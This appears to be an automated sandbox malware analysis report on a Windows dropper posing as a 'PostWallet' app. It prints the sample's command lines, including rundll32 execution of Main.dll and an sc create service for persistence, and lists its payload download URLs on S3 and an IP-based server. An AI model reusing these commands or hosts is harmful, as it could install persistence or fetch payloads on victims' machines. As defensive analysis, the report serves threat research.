          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF78334 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6CF78334
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6E39F81F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6E39F81F
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\System32\rundll32.exeNetwork Connect: 3.5.232.137 443Jump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF54A50 ShellExecuteExW,WaitForSingleObject,CloseHandle,GetClassNameW,lstrcmpW,ShowWindow,4_2_6CF54A50
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess created: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe" --squirrel-firstrunJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMainJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMainJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= autoJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= autoJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_00ED82D0 InitializeSecurityDescriptor,malloc,InitializeAcl,AllocateAndInitializeSid,IsValidSid,AddAccessAllowedAce,GetAce,GetAce,SetSecurityDescriptorDacl,Warning,SetFileSecurityW,Warning,FreeSid,free,free,4_2_00ED82D0
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_00ED82D0 InitializeSecurityDescriptor,malloc,InitializeAcl,AllocateAndInitializeSid,IsValidSid,AddAccessAllowedAce,GetAce,GetAce,SetSecurityDescriptorDacl,Warning,SetFileSecurityW,Warning,FreeSid,free,free,4_2_00ED82D0
          Source: ClassicIE_64.dll.13.drBinary or memory string: bn2.txtShell_TrayWnd
          Source: ClassicStartMenuDLL.dll.13.drBinary or memory string: desktop::{031E4825-7B94-4DC3-B131-E946B44C8DD5}libraries::{20D04FE0-3AEA-1069-A2D8-08002B30309D}computeropenMenu.MenuExitExitEnableExitMenu.MenuHelpHelpMenu.MenuSettingsSettingsMenu.OpenAllO&pen All UsersMenu.Open&OpenMenu.ExplorerWindows ExplorerExplorerPathEnableExplorerShiftRightStartHoverDelayHoverAllProgramsDelayMiddleClickEnableSettingsShiftClickSkipMetroApplicationManager_DesktopShellWindowButtonMSTaskSwWClassReBarWindow32ClassicStartMenuDLL.dllProgmanCrashDumpCompatibilityFixesStartMenu DLL: InitStartMenuDLLuser32.dllSetWindowCompositionAttributecomctl32.dllDrawThemeTextExDrawThemeTextuxtheme.dllDrawThemeBackground#32770gdi32.dllStretchDIBitsapi-ms-win-shlwapi-winrt-storage-l1-1-1.dllshlwapi.dllshlwapi.dlldwmapi.dlldwmapi.dll"
          Source: ClassicIE_64.dll.13.drBinary or memory string: ;Shell_TrayWndH
          Source: ClassicStartMenuDLL.dll.13.drBinary or memory string: %s\CSM_Crash%d.dmpMiniDumpWriteDumpdbghelp.dll%LOCALAPPDATA%Shell_TrayWndClockButtonTrayClockWClassToolbarWindow32Shell_SecondaryTrayWndWSMHotkeyCSMHotkeyShiftWinHideUserPicDesktop More Programs PaneDesktop Open Pane HostDV2ControlHostTaskbarColorTaskbarOpacityTaskbarLookTaskbarTextColorCustomTaskbarshell:::{2559a1f8-21d7-11d4-bdaf-00c04f60b9f0}ImmersiveStartBackgrounduxtheme.dll"
          Source: ClassicExplorer32.dll.13.dr, ClassicExplorer64.dll.13.drBinary or memory string: ProgmanCabinetWClass
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_00ED8D9F cpuid 4_2_00ED8D9F
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: GetLocaleInfoW,4_2_6CF96DEB
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: EnumSystemLocalesW,4_2_6CF8EF3A
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_6CF96F11
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: GetLocaleInfoW,4_2_6CF96980
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: EnumSystemLocalesW,4_2_6CF96A72
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: EnumSystemLocalesW,4_2_6CF96A27
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_6CF96B98
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: EnumSystemLocalesW,4_2_6CF96B0D
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,4_2_6CF96785
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_6CF970E6
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: GetLocaleInfoW,4_2_6CF97017
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: GetLocaleInfoW,4_2_6CF8F3FF
          Source: C:\Windows\System32\rundll32.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,13_2_00415230
          Source: C:\Windows\System32\rundll32.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,13_2_004142E0
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeQueries volume information: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ComponentModel.DataAnnotations\v4.0_4.0.0.0__31bf3856ad364e35\System.ComponentModel.DataAnnotations.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_00ED4850 AllocateAndInitializeSid,calloc,InitializeAcl,GetLastError,Warning,AddAccessAllowedAce,GetLastError,Warning,IsValidAcl,GetLastError,Warning,LocalAlloc,InitializeSecurityDescriptor,GetLastError,Warning,SetSecurityDescriptorDacl,GetLastError,Warning,IsValidSecurityDescriptor,GetLastError,Warning,CreateNamedPipeW,GetLastError,Warning,CreateEventW,GetLastError,Warning,FreeSid,free,LocalFree,CloseHandle,CloseHandle,ConnectNamedPipe,GetLastError,GetLastError,Warning,FreeSid,free,LocalFree,4_2_00ED4850
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeCode function: 0_2_000EB06B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_000EB06B
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_00ED6810 calloc,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetLastError,ImpersonateLoggedOnUser,GetLastError,GetUserNameW,RevertToSelf,GetLastError,Warning,Warning,free,Warning,Warning,GetEnvironmentStringsW,GetLastError,CreateEnvironmentBlock,GetLastError,GetLastError,LoadUserProfileW,GetLastError,CreateEnvironmentBlock,GetLastError,GetLastError,SetEnvironmentVariableW,FreeEnvironmentStringsW,DestroyEnvironmentBlock,DestroyEnvironmentBlock,free,UnloadUserProfile,CloseHandle,free,GetLastError,4_2_00ED6810
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_00ED4B50 socket,setsockopt,WSAGetLastError,htonl,htons,bind,listen,WSAGetLastError,CreateEventW,GetLastError,WSAEventSelect,WSAGetLastError,CloseHandle,closesocket,4_2_00ED4B50

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure1
          Valid Accounts          		1
          Native API          		1
          DLL Side-Loading          		1
          Exploitation for Privilege Escalation          		1
          Disable or Modify Tools          		OS Credential Dumping1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		2
          Ingress Tool Transfer          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts2
          Command and Scripting Interpreter          		1
          Valid Accounts          		1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		LSASS Memory1
          Account Discovery          		Remote Desktop ProtocolData from Removable Media21
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts3
          Service Execution          		5
          Windows Service          		1
          Valid Accounts          		2
          Obfuscated Files or Information          		Security Account Manager3
          File and Directory Discovery          		SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCron1
          Registry Run Keys / Startup Folder          		1
          Access Token Manipulation          		1
          Timestomp          		NTDS44
          System Information Discovery          		Distributed Component Object ModelInput Capture13
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script5
          Windows Service          		1
          DLL Side-Loading          		LSA Secrets1
          Query Registry          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts113
          Process Injection          		13
          Masquerading          		Cached Domain Credentials231
          Security Software Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
          Registry Run Keys / Startup Folder          		1
          Valid Accounts          		DCSync2
          Process Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Access Token Manipulation          		Proc Filesystem141
          Virtualization/Sandbox Evasion          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt141
          Virtualization/Sandbox Evasion          		/etc/passwd and /etc/shadow1
          Application Window Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron113
          Process Injection          		Network Sniffing1
          System Owner/User Discovery          		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
          Rundll32          		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1404607 Sample: 00023948209303294#U00ac3203... Startdate: 07/03/2024 Architecture: WINDOWS Score: 80 73 s3-r-w.sa-east-1.amazonaws.com 2->73 75 bucreate203920233.s3.sa-east-1.amazonaws.com 2->75 79 Multi AV Scanner detection for dropped file 2->79 81 Multi AV Scanner detection for submitted file 2->81 83 Machine Learning detection for dropped file 2->83 85 Yara detected Generic Downloader 2->85 14 00023948209303294#U00ac320302282349843984903.exe 4 2->14         started        17 00023948209303294#U00ac320302282349843984903.exe 2->17         started        signatures3 process4 file5 71 C:\Users\user\AppData\Local\...\Update.exe, PE32 14->71 dropped 19 Update.exe 14 20 14->19         started        process6 file7 53 C:\Users\user\AppData\...\vmwarebase.dll, PE32 19->53 dropped 55 C:\Users\user\AppData\...\vcruntime140.dll, PE32 19->55 dropped 57 C:\Users\user\AppData\...\FilePost?a.exe, PE32 19->57 dropped 59 C:\Users\user\AppData\Local\...\Update.exe, PE32 19->59 dropped 22 FilePost?a.exe 2 19->22         started        process8 signatures9 87 Contain functionality to detect virtual machines 22->87 25 FilePost?a.exe 3 22->25         started        28 conhost.exe 22->28         started        process10 file11 69 C:\Users\user\AppData\Local\...\Main.dll, PE32+ 25->69 dropped 30 cmd.exe 1 25->30         started        32 conhost.exe 25->32         started        process12 process13 34 rundll32.exe 30->34         started        36 conhost.exe 30->36         started        process14 38 rundll32.exe 59 34->38         started        dnsIp15 77 s3-r-w.sa-east-1.amazonaws.com 3.5.232.137, 443, 49705 AMAZON-02US United States 38->77 61 C:\Program Files\...\Windows XP Luna.skin, PE32 38->61 dropped 63 C:\Program Files\...\Windows Basic.skin, PE32 38->63 dropped 65 C:\Program Files\...\Windows Aero.skin7, PE32 38->65 dropped 67 26 other malicious files 38->67 dropped 89 System process connects to network (likely due to code injection or exploit) 38->89 91 Uses shutdown.exe to shutdown or reboot the system 38->91 43 cmd.exe 1 38->43         started        45 shutdown.exe 1 38->45         started        file16 signatures17 process18 process19 47 conhost.exe 43->47         started        49 sc.exe 1 43->49         started        51 conhost.exe 45->51         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          00023948209303294#U00ac320302282349843984903.exe8%VirustotalBrowse

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Program Files\Classic Shell\ClassicIEDLL_64.dll100%Joe Sandbox ML
          C:\Program Files\Classic Shell\ClassicExplorer32.dll3%ReversingLabs
          C:\Program Files\Classic Shell\ClassicExplorer32.dll0%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicExplorer64.dll3%ReversingLabs
          C:\Program Files\Classic Shell\ClassicExplorer64.dll0%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicExplorerSettings.exe0%ReversingLabs
          C:\Program Files\Classic Shell\ClassicExplorerSettings.exe0%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicIEDLL_32.dll0%ReversingLabs
          C:\Program Files\Classic Shell\ClassicIEDLL_32.dll0%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicIEDLL_64.dll17%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicIE_32.exe0%ReversingLabs
          C:\Program Files\Classic Shell\ClassicIE_32.exe0%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicIE_64.dll18%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicIE_64.exe0%ReversingLabs
          C:\Program Files\Classic Shell\ClassicIE_64.exe0%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicShellUpdate.exe0%ReversingLabs
          C:\Program Files\Classic Shell\ClassicShellUpdate.exe1%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicStartMenu.exe0%ReversingLabs
          C:\Program Files\Classic Shell\ClassicStartMenu.exe0%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicStartMenuDLL.dll0%ReversingLabs
          C:\Program Files\Classic Shell\ClassicStartMenuDLL.dll0%VirustotalBrowse
          C:\Program Files\Classic Shell\Skins\Classic Skin.skin0%ReversingLabs
          C:\Program Files\Classic Shell\Skins\Classic Skin.skin0%VirustotalBrowse
          C:\Program Files\Classic Shell\Skins\Classic Skin.skin70%ReversingLabs
          C:\Program Files\Classic Shell\Skins\Classic Skin.skin70%VirustotalBrowse
          C:\Program Files\Classic Shell\Skins\ClassicIE_64.exe0%ReversingLabs
          C:\Program Files\Classic Shell\Skins\ClassicIE_64.exe0%VirustotalBrowse
          C:\Program Files\Classic Shell\Skins\EppManifest.dll0%ReversingLabs
          C:\Program Files\Classic Shell\Skins\EppManifest.dll0%VirustotalBrowse
          C:\Program Files\Classic Shell\Skins\Full Glass.skin0%ReversingLabs
          C:\Program Files\Classic Shell\Skins\Full Glass.skin0%VirustotalBrowse
          C:\Program Files\Classic Shell\Skins\Metallic.skin70%ReversingLabs
          C:\Program Files\Classic Shell\Skins\Metallic.skin70%VirustotalBrowse

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://defaultcontainer/tempfiles/sample.diff0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.bsdiff0%Avira URL Cloudsafe
          http://defaultcontainer/lib/net48/vcruntime140.dll0%Avira URL Cloudsafe
          http://defaultcontainer/PostWallet.nuspec0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.nuspec0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.exe0%Avira URL Cloudsafe
          http://www.classicshell.net%s%sClassicShell.chm%s%sClassicShell.chm::/%s.html=~0%Avira URL Cloudsafe
          http://www.yoursite.com0%Avira URL Cloudsafe
          http://20.64.96.112/home3/MAOEM1002MMDLA.php?a=0%Avira URL Cloudsafe
          http://defaultcontainer/lib/net48/FilePost?a.exe0%Avira URL Cloudsafe
          http://defaultcontainer/_rels/.rels0%Avira URL Cloudsafe
          http://www.classicshell.0%Avira URL Cloudsafe
          http://20.64.96.112/home3/MAOEM1002MMDLA.php?a=1%VirustotalBrowse
          http://defaultcontainer/tempfiles/sample.dll0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.rels0%Avira URL Cloudsafe
          http://www.classicshell.net%s%sClassicShell.chm%s%sClassicShell.chm::/%s.html0%Avira URL Cloudsafe
          http://defaultcontainer/lib/net48/Main1.dll0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.shasum0%Avira URL Cloudsafe
          http://defaultcontainer/lib/net48/vmwarebase.dll0%Avira URL Cloudsafe
          http://www.classicshell.netRemindedLangVersionRemindedVersionSoftware0%Avira URL Cloudsafe
          http://schemas.openxmlformats.or0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.psmdcp0%Avira URL Cloudsafe
          http://defaultcontainer/package/services/metadata/core-properties/0efccca87b4345efa345d5a58c8332f0.p0%Avira URL Cloudsafe
          http://www.yoursite.com1%VirustotalBrowse

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          s3-r-w.sa-east-1.amazonaws.com
          		3.5.232.137
          		truefalse
            		high
            bucreate203920233.s3.sa-east-1.amazonaws.com
            		unknown
            		unknownfalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketTc.zipfalse
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketTc.zip=rundll32.exe, 0000000D.00000002.3859644880.000001D585A55000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://github.com/myuser/myrepoUpdate.exefalse
                    		high
                    http://defaultcontainer/tempfiles/sample.bsdiffUpdate.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    http://www.classicshell.net/faq/ClassicShellReadme.rtf.13.drfalse
                      		high
                      http://www.vmware.com/0Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drfalse
                        		high
                        http://defaultcontainer/lib/net48/vcruntime140.dllUpdate.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketTc.zipxrundll32.exe, 0000000D.00000002.3859644880.000001D585A55000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://www.classicshell.netClassicStartMenuDLL.dll.13.dr, ClassicExplorer32.dll.13.dr, ClassicShellUpdate.exe.13.dr, ClassicExplorer64.dll.13.dr, ClassicIEDLL_32.dll.13.drfalse
                            		high
                            http://defaultcontainer/tempfiles/sample.diffUpdate.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		low
                            http://defaultcontainer/tempfiles/sample.nuspecUpdate.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		low
                            https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketTc.zipMrundll32.exe, 0000000D.00000002.3859644880.000001D5859EB000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://www.vmware.com/0/Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drfalse
                                		high
                                http://www.classicshell.net/forum/viewforum.phpClassicShellReadme.rtf.13.drfalse
                                  		high
                                  http://www.classicshell.net/forum/viewforum.php?f=6ClassicShellReadme.rtf.13.drfalse
                                    		high
                                    https://api.github.com/#Update.exefalse
                                      		high
                                      http://defaultcontainer/PostWallet.nuspecUpdate.exe, 00000003.00000002.2060372901.000000000290E000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000027F9000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		low
                                      http://defaultcontainer/tempfiles/sample.exeUpdate.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		low
                                      http://www.classicshell.net%s%sClassicShell.chm%s%sClassicShell.chm::/%s.html=~ClassicStartMenuDLL.dll.13.drfalse
                                      • Avira URL Cloud: safe
                                      		low
                                      http://www.delphiforfun.org/rundll32.exe, rundll32.exe, 0000000D.00000002.3856964343.0000000000428000.00000020.00000001.01000000.0000000D.sdmp, Main.dll.8.dr, ClassicIE_64.dll.13.drfalse
                                        		high
                                        https://bucreate203920233.s3.sa-east-1.amazonaws.com/rundll32.exe, 0000000D.00000002.3859644880.000001D585A55000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://bucreate203920233.s3.sa-east-1.amazonaws.com/Rrundll32.exe, 0000000D.00000002.3859644880.000001D585A55000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.yoursite.comClassicStartMenuDLL.dll.13.dr, ClassicExplorer32.dll.13.dr, ClassicShellUpdate.exe.13.dr, ClassicExplorer64.dll.13.dr, ClassicIEDLL_32.dll.13.drfalse
                                            • 1%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://20.64.96.112/home3/MAOEM1002MMDLA.php?a=ClassicIE_64.dll.13.drfalse
                                            • 1%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://defaultcontainer/lib/net48/FilePost?a.exeUpdate.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		low
                                            http://defaultcontainer/_rels/.relsUpdate.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		low
                                            http://www.classicshell.ClassicShellReadme.rtf.13.drfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://defaultcontainer/tempfiles/sample.dllUpdate.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		low
                                            http://defaultcontainer/tempfiles/sample.relsUpdate.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		low
                                            http://www.classicshell.net%s%sClassicShell.chm%s%sClassicShell.chm::/%s.htmlClassicExplorer32.dll.13.dr, ClassicExplorer64.dll.13.dr, ClassicIEDLL_32.dll.13.drfalse
                                            • Avira URL Cloud: safe
                                            		low
                                            http://defaultcontainer/lib/net48/Main1.dllUpdate.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		low
                                            http://defaultcontainer/tempfiles/sample.shasumUpdate.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		low
                                            http://www.classicshell.net/forum/viewforum.php?f=11ClassicShellReadme.rtf.13.drfalse
                                              		high
                                              http://www.classicshell.net/ClassicShellReadme.rtf.13.drfalse
                                                		high
                                                http://defaultcontainer/lib/net48/vmwarebase.dllUpdate.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		low
                                                http://www.classicshell.net/files/updates/update_PAClassicStartMenuDLL.dll.13.dr, ClassicExplorer32.dll.13.dr, ClassicShellUpdate.exe.13.dr, ClassicExplorer64.dll.13.dr, ClassicIEDLL_32.dll.13.drfalse
                                                  		high
                                                  http://www.classicshell.netRemindedLangVersionRemindedVersionSoftwareClassicShellUpdate.exe.13.drfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://schemas.openxmlformats.orUpdate.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://defaultcontainer/tempfiles/sample.psmdcpUpdate.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		low
